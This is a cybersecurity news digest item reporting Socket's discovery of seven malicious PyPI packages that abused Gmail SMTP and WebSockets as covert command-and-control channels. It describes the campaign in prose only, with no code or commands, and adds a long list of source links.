CyberSecurity news
FlagThis
securebulletin.com@Secure Bulletin
//
Attackers are increasingly turning to trusted services like Gmail and Google APIs to create stealthy command-and-control (C2) channels. This tactic allows them to mask malicious activities within legitimate network traffic, making detection and mitigation significantly harder. By leveraging platforms like Gmail and Google Drive, threat actors can embed their communications within encrypted channels provided by reputable services, bypassing many traditional security measures. These communications are encrypted by Gmail’s TLS, further complicating detection efforts.
A recent investigation by Socket's Threat Research Team uncovered a campaign using malicious Python packages to establish covert tunnels via Gmail’s SMTP protocol, enabling attackers to exfiltrate data and execute remote commands undetected. Seven malicious PyPI packages, operating under the "Coffin Codes" theme, were found abusing Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. These packages, once installed, establish an encrypted connection to Gmail’s SMTP server using hardcoded credentials, sending signals and critical information to attacker-controlled email addresses.
The identified packages include Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb. While the packages have been removed from PyPI, one of them was downloaded over 18,000 times before removal. The most advanced variants of the packages also establish outbound WebSocket connections, enabling attackers to issue commands, transfer files, and potentially gain deeper access into the victim's network. This highlights the ongoing risks posed by supply chain attacks and the exploitation of trusted cloud services.
References :
A recent investigation by Socket's Threat Research Team uncovered a campaign using malicious Python packages to establish covert tunnels via Gmail’s SMTP protocol, enabling attackers to exfiltrate data and execute remote commands undetected. Seven malicious PyPI packages, operating under the "Coffin Codes" theme, were found abusing Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. These packages, once installed, establish an encrypted connection to Gmail’s SMTP server using hardcoded credentials, sending signals and critical information to attacker-controlled email addresses.
The identified packages include Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb. While the packages have been removed from PyPI, one of them was downloaded over 18,000 times before removal. The most advanced variants of the packages also establish outbound WebSocket connections, enabling attackers to issue commands, transfer files, and potentially gain deeper access into the victim's network. This highlights the ongoing risks posed by supply chain attacks and the exploitation of trusted cloud services.
Share:
References :
- securityonline.info: Malicious Python Packages Exploited Gmail as Covert Command-and-Control Channels
- BleepingComputer: Malicious PyPI packages abuse Gmail, websockets to hijack systems
- bsky.app: Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution.
- bsky.app: Socket Security has spotted seven malicious PyPI packages that use Gmail SMTP servers as tunnels to infected systems
- socket.dev: Packages use Gmail, making these attempts less likely to be flagged by firewalls and endpoint detection systems since SMTP is commonly treated as legitimate traffic.
- securityonline.info: Malicious Python Packages Exploited Gmail as Covert Command-and-Control Channels
- Cyber Security News: Seven Malicious Packages Exploit Gmail SMTP to Execute Harmful Commands
- gbhackers.com: Seven Malicious Packages Exploit Gmail SMTP to Run Harmful Commands
- Virus Bulletin: Socket’s Threat Research Team uncovered malicious Python packages designed to create a tunnel via Gmail. These seven packages: use Gmail, making these attempts less likely to be flagged by firewalls and endpoint detection systems since SMTP is commonly treated as legitimate traffic.
- gbhackers.com: Seven Malicious Packages Exploit Gmail SMTP to Run Harmful Commands
- cyberpress.org: Seven Malicious Packages Exploit Gmail SMTP to Execute Harmful Commands
- socket.dev: Using Trusted Protocols Against You: Gmail as a C2 Mechanism
- Secure Bulletin: In the ever-evolving landscape of cybersecurity, attackers are increasingly exploiting trusted services to establish covert command-and-control (C2) channels.
- securebulletin.com: Hijacking Trust: how Gmail and Google APIs are being weaponized for stealthy C2 channels
- bsky.app: Socket Security has spotted seven malicious PyPI packages that use Gmail SMTP servers as tunnels to infected systems
- Davey Winder: Gmail Warning As Data-Stealing Hacker Tunnel Confirmed
- Cyber Security News: 7 Malicious PyPI Packages Abuse Gmail’s SMTP Protocol to Execute Malicious Commands
Classification:
- HashTags: #C2 #Gmail #GoogleAPIs
- Company: Google
- Target: Internal dashboards, APIs, admin panels
- Product: Gmail, Google APIs
- Feature: C2 channels
- Type: Malware
- Severity: Major